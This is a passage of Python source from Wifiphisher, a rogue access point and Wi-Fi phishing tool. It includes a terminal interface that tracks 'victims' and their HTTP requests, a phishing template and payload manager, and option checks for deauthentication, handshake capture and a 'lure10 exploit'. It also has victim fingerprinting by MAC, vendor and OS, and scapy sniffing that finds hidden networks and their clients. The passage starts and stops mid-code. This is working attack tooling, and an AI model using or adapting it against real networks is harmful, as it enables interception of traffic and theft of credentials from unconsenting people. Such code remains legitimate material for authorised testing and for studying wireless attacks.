note: The display system is setup like the following: ---------------------------------------- - (1,3)Options - - (3,5)Header - - (4,3)**************************** - - * ^ * - - * | * - - * | * - - < * |---- * - - v * | v * - - v * | v * - - v * | v * - - v * v v * - - v ************v*************** - - v v v - -----v-------------v------v------------- v v v v v > max_window_length-5 v v max_window_height-9 v V v--> box_height-2 """ # get the page boundary page_boundary = list(range(1 + (ap_info.max_row * (ap_info.page_number - 1)), ap_info.max_row + 1 + (ap_info.max_row * (ap_info.page_number - 1)))) # remove previous content and draw border ap_info.box.erase() ap_info.box.border(0) # show the header header_fmt = "{0:30} {1:16} {2:3} {3:4} {4:9} {5:5} {6:20}" header = header_fmt.format("ESSID", "BSSID", "CH", "PWR", "ENCR", "CLIENTS", "VENDOR") opt_str = ("Options: [Esc] Quit [Up Arrow] Move Up " "[Down Arrow] Move Down") try: window_l = screen.getmaxyx()[1] screen.addstr(1, 3, display_string(window_l - 3, opt_str)) screen.addstr(3, 5, display_string(window_l - 5, header)) except curses.error: return # show all the items based on their position for item_position in page_boundary: # in case of no access points discovered yet if self.total_ap_number == 0: display_str = "No access point has been discovered yet!" try: ap_info.box.addstr(1, 1, display_string(ap_info.max_l - 1, display_str), self.highlight_text) except curses.error: return # in case of at least one access point else: # get the access point and it's vendor access_point = self.access_points[item_position - 1] vendor = self.mac_matcher.get_vendor_name( access_point.mac_address) # the display format for showing access points display_text = (( "{0:30} {1:17} {2:2} {3:3}% {4:^8} {5:^5}" " {6:20}").format( access_point.name, access_point.mac_address, access_point.channel, access_point.signal_strength, access_point.encryption, access_point.client_count, vendor)) # shows whether the access point should be highlighted or not # based on our current position print_row_number = item_position - ap_info.max_row * ( ap_info.page_number - 1) # bypass the addstr exception try: if item_position == ap_info.pos: ap_info.box.addstr(print_row_number, 2, display_string( ap_info.max_l - 2, display_text), self.highlight_text) else: ap_info.box.addstr(print_row_number, 2, display_string( ap_info.max_l - 2, display_text), self.normal_text) except curses.error: return # stop if it is the last item in page if item_position == self.total_ap_number: break # update the screen screen.refresh() ap_info.box.refresh() class TuiMain(object): """ TuiMain class to represent the main terminal window """ def __init__(self): """ Construct the class :param self: A TuiMain object :type self: TuiMain :return: None :rtype: None """ self.blue_text = None self.orange_text = None self.yellow_text = None def gather_info(self, screen, info): """ Get the information from pywifiphisher and print them out :param self: A TuiMain object :param screen: A curses window object :param info: A namedtuple of printing information :type self: TuiMain :type screen: _curses.curses.window :type info: namedtuple :return: None :rtype: None """ # setup curses try: curses.curs_set(0) except curses.error: pass screen.nodelay(True) curses.init_pair(1, curses.COLOR_BLUE, screen.getbkgd()) curses.init_pair(2, curses.COLOR_YELLOW, screen.getbkgd()) curses.init_pair(3, curses.COLOR_RED, screen.getbkgd()) self.blue_text = curses.color_pair(1) | curses.A_BOLD self.yellow_text = curses.color_pair(2) | 
curses.A_BOLD self.red_text = curses.color_pair(3) | curses.A_BOLD while True: # catch the exception when screen size is smaller than # the text length is_done = self.display_info(screen, info) if is_done: return def print_http_requests(self, screen, start_row_num, http_output): """ Print the http request on the main terminal :param self: A TuiMain object :type self: TuiMain :param start_row_num: start line to print the http request type start_row_num: int :param http_output: string of the http requests :type http_output: str """ requests = http_output.splitlines() match_str = r"(.*\s)(request from\s)(.*)(\sfor|with\s)(.*)" for request in requests: # match the information from the input string match = re.match(match_str, request.decode('utf-8')) if match is None: continue # POST or GET request_type = match.group(1) # requst from request_from = match.group(2) # ip address or http address ip_address = match.group(3) # for or with for_or_with = match.group(4) resource = match.group(5) start_col = 0 screen.addstr(start_row_num, start_col, '[') start_col += 1 screen.addstr(start_row_num, start_col, '*', self.yellow_text) start_col += 1 screen.addstr(start_row_num, start_col, '] ') start_col += 2 # concatenate GET or POST screen.addstr(start_row_num, start_col, request_type, self.yellow_text) start_col += len(request_type) # concatenate the word 'request from' screen.addstr(start_row_num, start_col, request_from) start_col += len(request_from) # concatenate the ip address screen.addstr(start_row_num, start_col, ip_address, self.yellow_text) start_col += len(ip_address) # concatenate with or for screen.addstr(start_row_num, start_col, for_or_with) start_col += len(for_or_with) # resource url screen.addstr(start_row_num, start_col, resource, self.yellow_text) start_row_num += 1 def display_info(self, screen, info): """ Print the information of Victims on the terminal :param self: A TuiMain object :param screen: A curses window object :param info: A nameduple of printing information :type self: TuiMain :type screen: _curses.curses.window :type info: namedtuple :return True if users have pressed the Esc key :rtype: bool """ # Get accesspoint instance and read victims from file accesspoint_instance = accesspoint.AccessPoint.get_instance() accesspoint_instance.read_connected_victims_file() is_done = False screen.erase() _, max_window_length = screen.getmaxyx() try: # print the basic info on the right top corner screen.addstr(0, max_window_length - 30, "|") screen.addstr(1, max_window_length - 30, "|") # continue from the "Wifiphisher" screen.addstr(1, max_window_length - 29, " Wifiphisher " + info.version, self.blue_text) screen.addstr(2, max_window_length - 30, "|" + " ESSID: " + info.essid) screen.addstr(3, max_window_length - 30, "|" + " Channel: " + info.channel) screen.addstr(4, max_window_length - 30, "|" + " AP interface: " + info.ap_iface) screen.addstr(5, max_window_length - 30, "|" + " Options: [Esc] Quit") screen.addstr(6, max_window_length - 30, "|" + "_" * 29) # Print the extensions section screen.addstr(1, 0, "Extensions feed: ", self.blue_text) except curses.error: pass if info.em: # start raw number from 2 raw_num = 2 for client in info.em.get_output()[-5:]: screen.addstr(raw_num, 0, client) raw_num += 1 try: # Print the connected victims section screen.addstr(7, 0, "Connected Victims: ", self.blue_text) victims_instance = victim.Victims.get_instance() vict_dic = victims_instance.get_print_representation() row_counter = 8 for key in vict_dic: screen.addstr(row_counter, 0, key, 
self.red_text) screen.addstr(row_counter, 22, vict_dic[key]) row_counter += 1 # Print the http request section screen.addstr(13, 0, "HTTP requests: ", self.blue_text) if os.path.isfile('/tmp/wifiphisher-webserver.tmp'): http_output = check_output( ['tail', '-5', '/tmp/wifiphisher-webserver.tmp']) self.print_http_requests(screen, 14, http_output) except curses.error: pass # detect if users have pressed the Esc Key if screen.getch() == 27: is_done = True if info.phishinghttp.terminate and info.args.quitonsuccess: is_done = True screen.refresh() return is_done def display_string(w_len, target_line): """ Display the line base on the max length of window length :param w_len: length of window :param target_line: the target display string :type w_len: int :type target_line: str :return: The final displaying string :rtype: str """ return target_line if w_len >= len(target_line) else target_line[:w_len] def line_splitter(num_of_words, line): """ Split line to the shorter lines :param num_of_words: split the line into the line with lenth equeal to num_of_words :type num_of_words: int :param line: A sentence :type line: str :return: tuple of shorter lines :rtype: tuple """ pieces = line.split() return (" ".join(pieces[i:i + num_of_words]) for i in range(0, len(pieces), num_of_words)) File: wifiphisher/common/phishingpage.py """ This module handles all the phishing related operations for Wifiphisher.py """ import os from shutil import copyfile import wifiphisher.common.constants as constants try: from configparser import ConfigParser, RawConfigParser except ImportError: from configparser import ConfigParser, RawConfigParser def config_section_map(config_file, section): """ Map the values of a config file to a dictionary. """ config = ConfigParser() config.read(config_file) dict1 = {} if section not in config.sections(): return dict1 options = config.options(section) for option in options: try: dict1[option] = config.get(section, option) except KeyError: dict1[option] = None return dict1 class InvalidTemplate(Exception): """ Exception class to raise in case of a invalid template """ def __init__(self): Exception.__init__(self, "The given template is either invalid or " + "not available locally!") class PhishingTemplate(object): """ This class represents phishing templates """ def __init__(self, name): """ Construct object. :param self: A PhishingTemplate object :type self: PhishingTemplate :return: None :rtype: None .. 
todo:: Maybe add a category field """ # setup all the variables config_path = os.path.join(constants.phishing_pages_dir, name, 'config.ini') info = config_section_map(config_path, 'info') self._name = name self._display_name = info['name'] self._description = info['description'] self._payload = False self._config_path = os.path.join(constants.phishing_pages_dir, self._name, 'config.ini') if 'payloadpath' in info: self._payload = info['payloadpath'] self._path = os.path.join(constants.phishing_pages_dir, self._name.lower(), constants.SCENARIO_HTML_DIR) self._path_static = os.path.join(constants.phishing_pages_dir, self._name.lower(), constants.SCENARIO_HTML_DIR, 'static') self._context = config_section_map(config_path, 'context') self._extra_files = [] @staticmethod def update_config_file(payload_filename, config_path): """ Update the configuration file :param self: A PhishingTemplate object :param payload_filename: the filename for the payload :param config_path: the file path for the configuration :type self: PhishingTemplate :type payload_filename: str :type config_path: str :return: None :rtype: None """ original_config = ConfigParser() original_config.read(config_path) # new config file object config = RawConfigParser() # update the info section config.add_section('info') options = original_config.options('info') for option in options: if option != "payloadpath": config.set('info', option, original_config.get('info', option)) else: dirname = os.path.dirname( original_config.get('info', 'payloadpath')) filepath = os.path.join(dirname, payload_filename) config.set('info', option, filepath) # update the context section config.add_section('context') dirname = os.path.dirname( original_config.get('context', 'update_path')) filepath = os.path.join(dirname, payload_filename) config.set('context', 'update_path', filepath) with open(config_path, 'w') as configfile: config.write(configfile) def update_payload_path(self, filename): """ :param self: A PhishingTemplate object :filename: the filename for the payload :type self: PhishingTemplate :type filename: str :return: None :rtype: None """ config_path = self._config_path self.update_config_file(filename, config_path) # update payload attribute info = config_section_map(config_path, 'info') self._payload = False if 'payloadpath' in info: self._payload = info['payloadpath'] self._context = config_section_map(config_path, 'context') self._extra_files = [] def merge_context(self, context): """ Merge dict context with current one In case of confict always keep current values """ context.update(self._context) self._context = context def get_context(self): """ Return the context of the template. :param self: A PhishingTemplate object :type self: PhishingTemplate :return: the context of the template :rtype: dict """ return self._context def get_display_name(self): """ Return the display name of the template. :param self: A PhishingTemplate object :type self: PhishingTemplate :return: the display name of the template :rtype: str """ return self._display_name def get_payload_path(self): """ Return the payload path of the template. :param self: A PhishingTemplate object :type self: PhishingTemplate :return: The path of the template :rtype: bool """ return self._payload def has_payload(self): """ Return whether the template has a payload. 
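        A template is considered to have a payload when the info section
        of its config.ini defines a payloadpath entry.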
:param self: A PhishingTemplate object :type self: PhishingTemplate :return: boolean if it needs payload :rtype: bool """ if self._payload: return True return False def get_description(self): """ Return the description of the template. :param self: A PhishingTemplate object :type self: PhishingTemplate :return: the description of the template :rtype: str """ return self._description def get_path(self): """ Return the path of the template files. :param self: A PhishingTemplate object :type self: PhishingTemplate :return: the path of template files :rtype: str """ return self._path def get_path_static(self): """ Return the path of the static template files. JS, CSS, Image files lie there. :param self: A PhishingTemplate object :type self: PhishingTemplate :return: the path of static template files :rtype: str """ return self._path_static def use_file(self, path): """ Copies a file in the filesystem to the path of the template files. :param self: A PhishingTemplate object :type self: PhishingTemplate :param path: path of the file that is to be copied :type self: str :return: the path of the file under the template files :rtype: str """ if path is not None and os.path.isfile(path): filename = os.path.basename(path) copyfile(path, self.get_path_static() + filename) self._extra_files.append(self.get_path_static() + filename) return filename def remove_extra_files(self): """ Removes extra used files (if any) :param self: A PhishingTemplate object :type self: PhishingTemplate :return: None :rtype: None """ for filename in self._extra_files: if os.path.isfile(filename): os.remove(filename) def __str__(self): """ Return a string representation of the template. :param self: A PhishingTemplate object :type self: PhishingTemplate :return: the name followed by the description of the template :rtype: str """ return self._display_name + "\n\t" + self._description + "\n" class TemplateManager(object): """ This class handles all the template management operations """ def __init__(self, data_pages=None): """ Construct object. :param self: A TemplateManager object :param data_pages: The directory containing the templates :type self: TemplateManager :return: None :rtype: None """ # setup the templates self._template_directory = data_pages or constants.phishing_pages_dir if data_pages: constants.phishing_pages_dir = data_pages page_dirs = os.listdir(self._template_directory) self._templates = {} for page in page_dirs: if os.path.isdir(page) and self.is_valid_template(page)[0]: self._templates[page] = PhishingTemplate(page) # add all the user templates to the database self.add_user_templates() def get_templates(self): """ Return all the available templates. :param self: A TemplateManager object :type self: TemplateManager :return: all the available templates :rtype: dict """ return self._templates def is_valid_template(self, name): """ Validate the template :param self: A TemplateManager object :param name: A directory name :type self: A TemplateManager object :return: tuple of is_valid and output string :rtype: tuple """ html = False dir_path = os.path.join(self._template_directory, name) # check config file... if not "config.ini" in os.listdir(dir_path): return False, "Configuration file not found in: " try: tdir = os.listdir(os.path.join(dir_path, constants.SCENARIO_HTML_DIR)) except OSError: return False, "No " + constants.SCENARIO_HTML_DIR + " directory found in: " # Check HTML files... 
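        # A scenario is accepted as soon as at least one .html file is found
        # in its html/ directory; other assets (css, js, images) are not
        # inspected here.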
for tfile in tdir: if tfile.endswith(".html"): html = True break if not html: return False, "No HTML files found in: " # and if we found them all return true and template directory name return True, name def find_user_templates(self): """ Return all the user's templates available. :param self: A TemplateManager object :type self: TemplateManager :return: all the local templates available :rtype: list """ # a list to store file names in local_templates = [] # loop through the directory content for name in os.listdir(self._template_directory): # check to see if it is a directory and not in the database if (os.path.isdir(os.path.join(self._template_directory, name)) and name not in self._templates): # check template is_valid, output = self.is_valid_template(name) # if template successfully validated, then... if is_valid: # just add it to the list local_templates.append(name) else: # TODO: We should throw an exception instead here. # but if not then display which problem occurred print("[" + constants.R + "!" + constants.W + "] " + output + name) return local_templates def add_user_templates(self): """ Add all the user templates to the database. :param self: A TemplateManager object :type: self: TemplateManager :return: None :rtype: None """ # get all the user's templates user_templates = self.find_user_templates() # loop through the templates for template in user_templates: # create a template object and add it to the database local_template = PhishingTemplate(template) self._templates[template] = local_template @property def template_directory(self): return self._template_directory def on_exit(self): """ Delete any extra files on exit :param self: A TemplateManager object :type: self: TemplateManager :return: None :rtype: None """ for templ_obj in list(self._templates.values()): templ_obj.remove_extra_files() File: wifiphisher/common/utilities.py """Host common and generic functions. Host all the common and generic functions that are used throughout the project. """ from __future__ import (absolute_import, division, print_function, unicode_literals) from logging import getLogger from subprocess import PIPE, Popen from wifiphisher.common.constants import DN # pylint: disable=C0103 logger = getLogger(__name__) def execute_commands(commands): """Execute each command and log any errors.""" for command in commands: _, error = Popen(command.split(), stderr=PIPE, stdout=DN).communicate() if error: logger.error( "{command} has failed with the following error:\n{error}". format(command=command, error=error)) File: wifiphisher/common/opmode.py """ All logic regarding the Operation Modes (opmodes). The opmode is defined based on the user's arguments and the available resources of the host system """ import argparse import logging import os import sys import pyric import wifiphisher.common.constants as constants import wifiphisher.common.interfaces as interfaces import wifiphisher.extensions.handshakeverify as handshakeverify logger = logging.getLogger(__name__) class OpMode(object): """ Manager of the operation mode """ def __init__(self): """ Construct the class :param self: An OpMode object :type self: OpMode :return: None :rtype: None """ self.op_mode = 0x0 # True if the system only contains one phy interface # or if the user wants us to use only one phy # e.g. 
using the --interface option self._use_one_phy = False # The card which supports monitor and ap mode self._perfect_card = None def initialize(self, args): """ Initialize the opmode manager :param self: An OpMode object :param args: An argparse.Namespace object :type self: OpMode :type args: argparse.Namespace :return: None :rtype: None """ self._perfect_card, self._use_one_phy =\ interfaces.is_add_vif_required(args.interface, args.internetinterface, args.wpspbc_assoc_interface) self._check_args(args) def _check_args(self, args): """ Checks the given arguments for logic errors. :param self: An OpMode object :param args: An argparse.Namespace object :type self: OpMode :type args: argparse.Namespace :return: None :rtype: None """ if args.presharedkey and \ (len(args.presharedkey) < 8 or len(args.presharedkey) > 64): sys.exit('[' + constants.R + '-' + constants.W + '] Pre-shared key must be between 8 and 63 printable' 'characters.') if args.handshake_capture and not os.path.isfile( args.handshake_capture): sys.exit('[' + constants.R + '-' + constants.W + '] Handshake capture does not exist.') elif args.handshake_capture and not handshakeverify.\ is_valid_handshake_capture(args.handshake_capture): sys.exit('[' + constants.R + '-' + constants.W + '] Handshake capture does not contain valid handshake') if ((args.extensionsinterface and not args.apinterface) or (not args.extensionsinterface and args.apinterface)) and \ not (args.noextensions and args.apinterface): sys.exit('[' + constants.R + '-' + constants.W + '] --apinterface (-aI) and --extensionsinterface (-eI)' '(or --noextensions (-nE)) are used in conjuction.') if args.noextensions and args.extensionsinterface: sys.exit('[' + constants.R + '-' + constants.W + '] --noextensions (-nE) and --extensionsinterface (-eI)' 'cannot work together.') if args.lure10_exploit and args.noextensions: sys.exit('[' + constants.R + '-' + constants.W + '] --lure10-exploit (-lE) and --noextensions (-eJ)' 'cannot work together.') if args.lure10_exploit and not os.path.isfile(constants.LOCS_DIR + args.lure10_exploit): sys.exit('[' + constants.R + '-' + constants.W + '] Lure10 capture does not exist. Listing directory' 'of captures: ' + str(os.listdir(constants.LOCS_DIR))) if (args.mac_ap_interface and args.no_mac_randomization) or \ (args.mac_extensions_interface and args.no_mac_randomization): sys.exit( '[' + constants.R + '-' + constants.W + '] --no-mac-randomization (-iNM) cannot work together with' '--mac-ap-interface or --mac-extensions-interface (-iDM)') if args.deauth_essid and args.noextensions: sys.exit( '[' + constants.R + '-' + constants.W + '] --deauth-essid (-dE) cannot work together with' '--noextension (-nE)') # if args.deauth_essid is set we need the second card to # do the frequency hopping if args.deauth_essid and self._use_one_phy: print(('[' + constants.R + '!' + constants.W + '] Only one card was found. Wifiphisher will deauth only ' 'on the target AP channel')) # args.wAI should be used with args.wE if args.wpspbc_assoc_interface and not args.wps_pbc: sys.exit( '[' + constants.R + '!' + constants.W + '] --wpspbc-assoc-interface (-wAI) requires --wps-pbc (-wP) option.' ) # if args.logpath is defined args.logging must be set too if args.logpath and not args.logging: sys.exit( '[' + constants.R + '!' + constants.W + '] --logpath (-lP) requires --logging option.' ) # if args.credential_log_path is defined args.logging must be set too if args.credential_log_path and not args.logging: sys.exit( '[' + constants.R + '!' 
+ constants.W + '] --credential-log-path (-cP) requires --logging option.' ) if args.deauth_channels: for channel in args.deauth_channels: if channel > 14 or channel < 0: sys.exit( '[' + constants.R + '!' + constants.W + '] --deauth-channels (-dC) requires channels in range 1-14.' ) # If both args.mitminterface and args.internetinterface are provided, the # former takes precedence and the latter gets overwritten. # We have ensured that if that is the case, then args.mitminterface will be # overwritten with the value of args.internetinterface, whereas if no # args.internetinterface was provided, args.mitminterface will be set to a specific string. if args.mitminterface and args.mitminterface != "handledAsInternetInterface": print(('[' + constants.O + '!' + constants.W + '] Using both --mitminterface (-mI) and --internetinterface (-iI)' ' is redundant. Ignoring --internetinterface (-iI).')) def set_opmode(self, args, network_manager): """ Sets the operation mode. :param self: An OpMode object :param args: An argparse.Namespace object :param network_manager: A NetworkManager object :type self: OpMode :type args: argparse.Namespace :type network_manager: NetworkManager :return: None :rtype: None ..note: An operation mode resembles how the tool will best leverage the given resources. Modes of operation 1) AP and Extensions 0x1 2 cards, 2 interfaces i) AP, ii) EM Channel hopping: Enabled 2) AP, Extensions and Internet 0x2 3 cards, 3 interfaces i) AP, ii) EM iii) Internet Channel hopping: Enabled 3) AP-only and Internet 0x3 2 cards, 2 interfaces i) AP, ii) Internet 4) AP-only 0x4 1 card, 1 interface i) AP 5) AP and Extensions 0x5 1 card, 2 interfaces (1 card w/ vif support AP/Monitor) i) AP, ii) Extensions Channel hopping: Disabled !!Most common mode!! 6) AP and Extensions and Internet 0x6 2 cards, 3 interfaces Channel hopping: Disabled (Internet and 1 card w/ 1 vif support AP/Monitor) i) AP, ii) Extensions, iii) Internet 7) Advanced and WPS association 0x7 3 cards, 3 interfaces i) AP, ii) Extensions (Monitor), iii) Extensions (Managed) 8) Advanced and WPS association w/ 1 vif support AP/Monitor 0x8 2 cards, 3 interfaces i) AP, ii) Extensions (Monitor), iii) Extensions (Managed) """ if not args.internetinterface and not args.noextensions: if not self._use_one_phy: # check if there is WPS association interface if args.wpspbc_assoc_interface: self.op_mode = constants.OP_MODE7 logger.info("Starting OP_MODE7 (0x7)") else: self.op_mode = constants.OP_MODE1 logger.info("Starting OP_MODE1 (0x1)") else: # TODO: We should not add any vifs here. 
# These should happen after the interface # checks in main engine if self._perfect_card is not None: network_manager.add_virtual_interface(self._perfect_card) # check if there is WPS association interface if args.wpspbc_assoc_interface: self.op_mode = constants.OP_MODE8 logger.info("Starting OP_MODE8 (0x8)") else: self.op_mode = constants.OP_MODE5 logger.info("Starting OP_MODE5 (0x5)") if args.internetinterface and not args.noextensions: if not self._use_one_phy: self.op_mode = constants.OP_MODE2 logger.info("Starting OP_MODE2 (0x2)") else: if self._perfect_card is not None: network_manager.add_virtual_interface(self._perfect_card) self.op_mode = constants.OP_MODE6 logger.info("Starting OP_MODE6 (0x6)") if args.internetinterface and args.noextensions: self.op_mode = constants.OP_MODE3 logger.info("Starting OP_MODE3 (0x3)") if args.noextensions and not args.internetinterface: self.op_mode = constants.OP_MODE4 logger.info("Starting OP_MODE4 (0x4)") def internet_sharing_enabled(self): """ :param self: An OpMode object :type self: OpMode :return: True if we are operating in a mode that shares Internet access. :rtype: bool """ return self.op_mode in [constants.OP_MODE2, constants.OP_MODE3, constants.OP_MODE6] def extensions_enabled(self): """ :param self: An OpModeManager object :type self: OpModeManager :return: True if we are loading extensions :rtype: bool """ return self.op_mode in [ constants.OP_MODE1, constants.OP_MODE2, constants.OP_MODE5, constants.OP_MODE6, constants.OP_MODE7, constants.OP_MODE8 ] def freq_hopping_enabled(self): """ :param self: An OpMode object :type self: OpMode :return: True if we are separating the wireless cards for extensions and launching AP. :rtype: bool ..note: MODE5 and MODE6 only use one card to do deauth and lunch ap so it is not allowed to do frequency hopping. """ return self.op_mode in [ constants.OP_MODE1, constants.OP_MODE2, constants.OP_MODE7 ] def assoc_enabled(self): """ :param self: An OpMode object :type self: OpMode :return: True if we are using managed Extensions(that associate to WLANs) :rtype: bool """ return self.op_mode in [constants.OP_MODE7, constants.OP_MODE8] def validate_ap_interface(interface): """ Validate the given interface :param interface: Name of an interface :type interface: str :return: the ap interface :rtype: str :raises: argparse.ArgumentTypeError in case of invalid interface """ if not(pyric.pyw.iswireless(interface) and \ pyric.pyw.isinterface(interface) and \ interfaces.does_have_mode(interface, "AP")): raise argparse.ArgumentTypeError("Provided interface ({})" " either does not exist or" " does not support AP mode" \ .format(interface)) return interface File: wifiphisher/common/victim.py """Module to keep track the victims connected to the rogue AP.""" import time import wifiphisher.common.constants as constants from wifiphisher.common.macmatcher import MACMatcher as macmatcher class Victim(object): """Resembles a Victim (i.e. a connected device to the rogue AP).""" def __init__(self, vmac_address, ip_address): """Create a Victim object.""" self.vmac_address = vmac_address self.ip_address = ip_address self.os = "" self.vendor = "" self.timestamp = time.time() def associate_victim_mac_to_vendor(self, vmac_address): """Find the victims vendor by its mac address. 
Receives a victims mac address as input, finds the corresponding vendor by using a macmacther object and then accesses the victim dictionary and changes the vendor for the victim with the corresponding mac address :param self: empty Victim instance :type self: Victim :param vmac_address: mac address of the victim :type vmac_address: str """ macmacther_instance = macmatcher(constants.MAC_PREFIX_FILE) vendor = macmacther_instance.get_vendor_name(vmac_address) victims_instance = Victims.get_instance() if vmac_address in victims_instance.victims_dic: victims_instance.victims_dic[vmac_address].vendor = vendor else: raise Exception("Error: No such mac address exists in dictionary") def assign_ip_to_victim(self, vmac_address, ip_address): """Update the ip address of the victim by mac address.""" victims_instance = Victims.get_instance() if vmac_address in victims_instance.victims_dic: victims_instance.victims_dic[vmac_address].ip_address = ip_address else: raise Exception("Error: No such mac address exists in dictionary") class Victims(): """Singleton class that manages all of the victims.""" # Instance will be stored here. __instance = None @staticmethod def get_instance(): """Return the instance of the class or create new if none exists.""" if Victims.__instance is None: Victims() return Victims.__instance def __init__(self): """Initialize the class.""" if Victims.__instance: raise Exception("Error: Victims class is a singleton!") else: Victims.__instance = self self.victims_dic = {} self.url_file = open(constants.URL_TO_OS_FILE, "r") def add_to_victim_dic(self, victim_obj): """Add new victim to the dictionary.""" self.victims_dic[victim_obj.vmac_address] = victim_obj def get_print_representation(self): """Return dic with five most recent victims in order to be printed. :param self: Victims instance :type self: Victims :rtype str """ mac_timestamp = {} sorted_mac_timestamp = [] most_recent_dic = {} max_victim_counter = 0 for value in list(self.victims_dic.values()): mac_timestamp[value.vmac_address] = value.timestamp sorted_mac_timestamp = sorted(list(mac_timestamp.items()), key=lambda p: float(p[1])) for item in reversed(sorted_mac_timestamp): if max_victim_counter >= 5: return most_recent_dic victim_obj = self.victims_dic[item[0]] victim_value = '\t' + victim_obj.ip_address + '\t' \ + victim_obj.vendor + '\t' + victim_obj.os most_recent_dic[victim_obj.vmac_address] = victim_value max_victim_counter += 1 return most_recent_dic def associate_victim_ip_to_os(self, ip_address, url): """Find and update Victims os based on the url it requests. Receives a victims ip address and request as input, finds the corresponding os by reading the initial requests file and then accesses the victim dictionary and changes the os for the victim with the corresponding ip address. 
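        Each line of the URL-to-OS file is expected to have the form
        ``<OS>|<URL substring>``.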
:param self: Victims instance :type self: Victims :param ip_address: ip address of the victim :type ip_address: str :param url: request of the victim :type url: str """ self.url_file.seek(0) for line in self.url_file: line = line.split("|") url_check = line[1].strip() os = line[0].strip() if url_check in url: for key in self.victims_dic: if ip_address == self.victims_dic[key].ip_address: self.victims_dic[key].os = os File: wifiphisher/common/recon.py """Handles all reconnaissance operations.""" from logging import getLogger from threading import Thread from time import sleep, strftime import scapy import scapy.layers.dot11 as dot11 import wifiphisher.common.globals as universal from wifiphisher.common.constants import LOCS_DIR, NON_CLIENT_ADDRESSES from wifiphisher.common.interfaces import NetworkManager LOGGER = getLogger(__name__) class AccessPoint(object): """Represents an access point.""" def __init__(self, ssid, bssid, channel, encryption, capture_file=False): # type: (str, str, str, str, bool) -> None """Initialize class with all the given arguments.""" self.name = ssid self.mac_address = bssid self.channel = channel self.encryption = encryption self.signal_strength = None self.client_count = 0 self._clients = set() if capture_file: with open(capture_file, "a") as _file: _file.write("{bssid} {ssid}\n".format(bssid=bssid, ssid=ssid)) def add_client(self, client): # type: (str) -> None """Add client to access point.""" if client not in self._clients: self._clients.add(client) self.client_count += 1 class AccessPointFinder(object): """Finds all the available access point.""" def __init__(self, ap_interface, network_manager): # type: (str, NetworkManager) -> None """Initialize class with all the given arguments.""" self._interface = ap_interface self.observed_access_points = list() self._capture_file = False self._should_continue = True self._hidden_networks = list() self._sniff_packets_thread = Thread(target=self._sniff_packets) self._channel_hop_thread = Thread(target=self._channel_hop) self._network_manager = network_manager def _process_packets(self, packet): # type: (scapy.layers.RadioTap) -> None """Process a RadioTap packet to find access points.""" # check the type of the packet if packet.haslayer(dot11.Dot11Beacon): # check if the packet has info field to prevent processing # malform beacon if hasattr(packet.payload, 'info'): # if the packet has no info (hidden ap) add MAC address of it # to the list # note \00 used for when ap is hidden and shows only the length # of the name. see issue #506 if not packet.info or b"\00" in packet.info: if packet.addr3 not in self._hidden_networks: self._hidden_networks.append(packet.addr3) # otherwise get it's name and encryption else: self._create_ap_with_info(packet) # if packet is a probe response and it's hidden add the # access point elif packet.haslayer(dot11.Dot11ProbeResp): if packet.addr3 in self._hidden_networks: self._create_ap_with_info(packet) # check to see if it is a client of access points elif packet.haslayer(dot11.Dot11): self._find_clients(packet) def _create_ap_with_info(self, packet): # type: (scapy.layers.RadioTap) -> None """Create and add an access point using the extracted information. Access points which are malformed or not in 2G channel list are excluded. 
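        Access points that were already observed only have their stored
        signal strength refreshed, and only when the new reading is more
        than five units stronger than the previous one.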
""" elt_section = packet[dot11.Dot11Elt] try: channel = str(ord(packet[dot11.Dot11Elt][2].info)) if int(channel) not in universal.ALL_2G_CHANNELS: return except (TypeError, IndexError): return mac_address = packet.addr3 name = None encryption_type = None non_decodable_name = "<contains non-printable chars>" # find the signal strength rssi = get_rssi(packet.notdecoded) new_signal_strength = calculate_signal_strength(rssi) # get the name of the access point # if the name is no utf8 compatible use pre set name try: name = elt_section.info.decode("utf8") except UnicodeDecodeError: name = non_decodable_name # just update signal strength in case of discovered # access point for access_point in self.observed_access_points: if mac_address == access_point.mac_address: # find the current and calculate the difference current_signal_strength = access_point.signal_strength signal_difference = new_signal_strength - current_signal_strength # update signal strength if difference is greater than 5 if signal_difference > 5: access_point.signal_strength = new_signal_strength return None # get encryption type encryption_type = find_encryption_type(packet) # with all the information gathered create and add the # access point access_point = AccessPoint( name, mac_address, channel, encryption_type, capture_file=self._capture_file) access_point.signal_strength = new_signal_strength self.observed_access_points.append(access_point) def _sniff_packets(self): # type: () -> None """Sniff packets one at a time until otherwise set.""" while self._should_continue: dot11.sniff( iface=self._interface, prn=self._process_packets, count=1, store=0) def capture_aps(self): """Create Lure10 capture file.""" self._capture_file = "{LOCS_DIR}area_{time}".format( LOCS_DIR=LOCS_DIR, time=strftime("%Y%m%d_%H%M%S")) LOGGER.info("Create lure10-capture file %s", self._capture_file) def find_all_access_points(self): # type: () -> None """Find all the visible and hidden access points.""" self._sniff_packets_thread.start() self._channel_hop_thread.start() def stop_finding_access_points(self): # type: () -> None """Stop looking for access points.""" self._should_continue = False wait_time = 10 self._channel_hop_thread.join(wait_time) self._sniff_packets_thread.join(wait_time) def _channel_hop(self): # type: () -> None """Change the interface's channel every three seconds. .. 
note: The channel range is between 1 to 13 """ # if the stop flag not set, change the channel while self._should_continue: for channel in universal.ALL_2G_CHANNELS: # added this check to reduce shutdown time if self._should_continue: self._network_manager.set_interface_channel( self._interface, channel) sleep(3) else: break def _find_clients(self, packet): # type: (scapy.layers.RadioTap) -> None """Find and add if a client is discovered.""" # find sender and receiver receiver = packet.addr1 sender = packet.addr2 # only continue if both addresses are available if sender and receiver: # find sender and receiver first half of MAC address receiver_identifier = receiver[:8] sender_identifier = sender[:8] else: return None # if a valid address is provided if (receiver_identifier, sender_identifier) not in NON_CLIENT_ADDRESSES: # if discovered access point is either sending or receving # add client if it's mac address is not in the MAC filter for access_point in self.observed_access_points: # get the access point MAC address access_point_mac = access_point.mac_address # in case access point is the reciever # add sender as client if access_point_mac == receiver: access_point.add_client(sender) # in case access point is the sender add reciever # as client elif access_point_mac == sender: access_point.add_client(receiver) def get_sorted_access_points(self): """Return all access points sorted based on signal strength.""" return sorted( self.observed_access_points, key=lambda ap: ap.signal_strength, reverse=True) def get_rssi(non_decoded_packet): # type: (scapy.layers.RadioTap) -> int """Return the rssi value of the packet.""" try: return -(256 - max( ord(non_decoded_packet[-4:-3]), ord(non_decoded_packet[-2:-1]))) except TypeError: return -100 def calculate_signal_strength(rssi): # type: (int) -> int """Calculate the signal strength of access point.""" signal_strength = 0 if rssi >= -50: signal_strength = 100 else: signal_strength = 2 * (rssi + 100) return signal_strength def find_encryption_type(packet): # type: (scapy.layers.RadioTap) -> str """Return the encryption type of the access point. .. note: Possible return values are WPA2, WPA, WEP, OPEN, 